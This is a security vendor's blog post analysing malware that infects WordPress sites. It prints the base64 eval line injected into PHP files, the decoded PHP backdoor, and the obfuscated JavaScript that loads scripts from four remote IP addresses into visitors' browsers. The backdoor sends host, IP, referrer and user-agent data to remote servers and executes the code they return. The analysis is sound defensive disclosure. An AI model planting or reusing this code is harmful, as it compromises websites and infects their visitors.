Research Blog

New Malware – Eval + GetMama + Encoded Javascript

We are seeing many WordPress sites on shared hosts getting compromised with an encoded javascript malware. It has multiple levels of obfuscation and that’s how it starts:

 

1- ALL PHP files with an eval (base64_decode line of code:

/*god_mode_on*/eval (base64_decode("ZXZhbC
hiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0
phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBvVmpGc2
JsTXdUa2RpVjFKWVRsZHdhMUl5ZURKWmJYYzFZa..

2- That long piece of code, once executed gets decoded to:

if (!function_exists(GetMama)){function opanki
($buf){$god_mode = $_SERVER["good"];
 str_replace("href","href",strt
olower($buf),$cnt_h); str_replace("<?xml&qu
ot;,"<?xml",strtolower($buf),$cnt_x); 
 if (($cnt_h > 2)&&($cnt_x =
= 0)) {$buf = $god_mode .&nb
sp;$buf;} return $buf; } function&nb
sp;GetMama(){$mother = "www.psite&
#46net";return $mother;}ob_start("opanki&
quot;);$show = false;function ahfudflfzdh
fhs($pa){global $show; global $god_mode;&
nbsp;$mama = GetMama();$file = urlen
code(__FILE__);if (isset($_SERVER["HTTP_HOST&q
uot;])){$host = $_SERVER["HTTP_HOST"
];}if (isset($_SERVER["REMOTE_ADDR"])){$i
p = $_SERVER["REMOTE_ADDR"];}if&nbsp
;(isset($_SERVER["HTTP_REFERER"])){$ref =
 urlencode($_SERVER["HTTP_REFERER"]);}if&
nbsp;(isset($_SERVER["HTTP_USER_AGENT"])){$ua&
nbsp;= urlencode(strtolower($_SERVER["HTTP_USE
R_AGENT"]));}$url = "http://"&n
bsp;. $pa . "/opp.php?mothe
r=" .$mama . "&file=&quot
; . $file . "&host="
 . $host . "&ip="&nb
sp;. $ip . "&ref=" &
#46 $ref . "&ua=" .$
ua;if( function_exists("curl_init") 
){$ch = curl_init($url);curl_setopt($ch, 
CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CU
RLOPT_TIMEOUT, 3);$ult = curl_exec($ch);}
 else {$ult = @file_get_contents($ur
l);} if (strpos($ult,"eval") !=
= false){$z = str_replace("eval&quot
;,"",$ult); eval($z); $show =&n
bsp;true; return true;} if (strpos($
ult,"ebna") !== false){$z =&nbs
p;str_replace("ebna","",$ult); 
$god_mode = $z; $show = true;&n
bsp;return true; $_SERVER["good"]&nb
sp;= $god_mode; } else {return 
false;}}$father[] = "146둩뒮
6245";$father[] = "31둨뒢&
#46103";$father[] = "91둴ል
6둄";$father[] = "91둴.
216ሩ";foreach($father as $ur){if&nbs
p;( ahfudflfzdhfhs($ur) ) { break&nb
sp;;}}if ($show === false){$script=’<s
cript>var _0x8ab7=["x31x34x36x2Ex31x3
8x35x2Ex32x35x34x2Ex32x34x35","x33x
31x2Ex31x38x34x2Ex32x34x32x2Ex31x30x33"
,"x39x31x2Ex31x39x36x2Ex32x31x36x2Ex31
x34x38","x39x31x2Ex31x39x36x2Ex32x31
x36x2Ex34x39","x73x63x72x69x70x74&qu
ot;,"x63x72x65x61x74x65x45x6Cx65x6Dx65x
6Ex74","x73x72x63","x68x74x74
x70x3Ax2Fx2F","x2Fx73x2Ex70x68x70&qu
ot;,"x68x65x61x64","x67x65x74x45
x6Cx65x6Dx65x6Ex74x73x42x79x54x61x67x4Ex61
x6Dx65","x61x70x70x65x6Ex64x43x68x69
x6Cx64"];var _0xa341=[_0x8ab7[0],_0x8ab7[1],
_0x8ab7[2],_0x8ab7[3]];for(var i in _0xa3
41){var js=document[_0x8ab7[5]](_0x8ab7[4]);js[_0x8
ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];var head=d
ocument[_0x8ab7[10]](_0x8ab7[9])[0];head[_0x8ab7[11]](js
);} ;</script>’;  $god_mode =&
nbsp;$script;} $_SERVER["good"] =&nb
sp;$god_mode; }

3- Which adds the following to the browser of anyone visiting the compromised site:

<script>var _0x8ab7=["146.185.25
4.245","31.184.242.103",&
quot;91.196.216.148","91.196&#
46;216.49","script","createEleme
nt","src","http://","/s
6;php","head","getElementsByTagName&
quot;,"appendChild"];var _0xa341=[_0x8ab7
[0],_0x8ab7[1],_0x8ab7[2],_0x8ab7[3]];for(var i&nbs
p;in _0xa341){var js=document[_0x8ab7[5]](_0x8
ab7[4]);js[_0x8ab7[6]]=_0x8ab7[7]+_0xa341[i]+_0x8ab7[8];
var head=document[_0x8ab7[10]](_0x8ab7[9])[0];head[
_0x8ab7[11]](js);} ;</script>

And that code (once executed by the browser) is used to generate a remote javascript include to load malware from 146.185.25 4.245, 31.184.242.103, 91.196.216.148 and 91.196.216.49.

 

Very nasty piece of code and we are seeing hundreds (if not thousands) of sites with it.

 

If your site is compromised, sign up with us and we will fix it for you: http://sucuri.net/signup

 

Client Love

Customer satisfaction is our top priority and our clients can confirm. Check out some real recommendations from real clients.
   
   

Scan your website FOR FREE